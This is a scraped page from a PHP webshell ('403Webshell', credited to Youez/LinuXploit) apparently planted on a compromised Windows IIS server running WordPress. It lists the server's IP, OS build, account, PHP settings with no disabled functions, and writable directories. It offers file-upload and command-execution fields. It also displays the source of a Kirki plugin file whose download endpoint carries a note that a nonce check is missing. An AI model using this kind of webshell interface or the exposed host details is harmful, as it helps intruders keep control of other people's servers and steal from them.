403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot/stirizo/wp-content/plugins/kirki/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /inetpub/wwwroot/stirizo/wp-content/plugins/kirki/includes/API.php
<?php

/**
 * Register routes for Media and Frontend
 *
 * @package kirki
 */

namespace Kirki;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

use Kirki\API\ContentManager\ContentManagerRest;
use Kirki\API\KirkiComments\KirkiCommentsRest;
use Kirki\API\Media;
use Kirki\API\Frontend\FrontendApi;

/**
 * API Class
 */
class API {



	/**
	 * Initialize the class
	 *
	 * @return void
	 */
	public function __construct() {
		add_action( 'rest_api_init', array( $this, 'register_api' ) );
		add_action( 'init', array( $this, 'download_zip_endpoint' ) );
	}

	/**
	 * Register_api
	 *
	 * @return void
	 */
	public function register_api() {
		// Media apis.
		$media = new Media();
		$media->register_routes();

		$content_manager = new ContentManagerRest();
		$content_manager->register_routes();

		$kirki_comments = new KirkiCommentsRest();
		$kirki_comments->register_routes();

		FrontendApi::register();
	}

	public function download_zip_endpoint() {
		if (
			! isset( $_GET['page-export'], $_GET['file-name'] ) ||
			'true' !== $_GET['page-export']
		) {
			return;
		}

		if ( ! HelperFunctions::has_access( KIRKI_ACCESS_LEVELS['FULL_ACCESS'] ) ) {
			wp_send_json_error( 'Not authorized', 401 );
		}

		// TODO: need to check nonce
		$this->downloadZIP();
	}

	private function downloadZIP() {
		$upload_dir = wp_upload_dir();
		$file_name  = HelperFunctions::sanitize_text( $_GET['file-name'] );
		$file_name  = basename( $file_name );
		// Check if the file has a .zip extension
		if ( pathinfo( $file_name, PATHINFO_EXTENSION ) !== 'zip' ) {
			echo 'Invalid file type.';
			die();
		}
		$zipFilePath = $upload_dir['basedir'] . "/$file_name";
		// Send the zip file to the client.
		header( 'Content-Type: application/zip' );
		header( 'Content-Disposition: attachment; filename="' . $file_name . '"' );
		header( 'Content-Length: ' . filesize( $zipFilePath ) );
		$this->output_file_and_cleanup( $zipFilePath, $file_name );
		exit;
	}

	private function output_file_and_cleanup( $path, $name ) {
		global $wp_filesystem;
		if ( empty( $wp_filesystem ) ) {
			require_once ABSPATH . 'wp-admin/includes/file.php';
			WP_Filesystem();
		}

		if ( $wp_filesystem->exists( $path ) ) {
			echo $wp_filesystem->get_contents( $path ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
			wp_delete_file( $path );
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit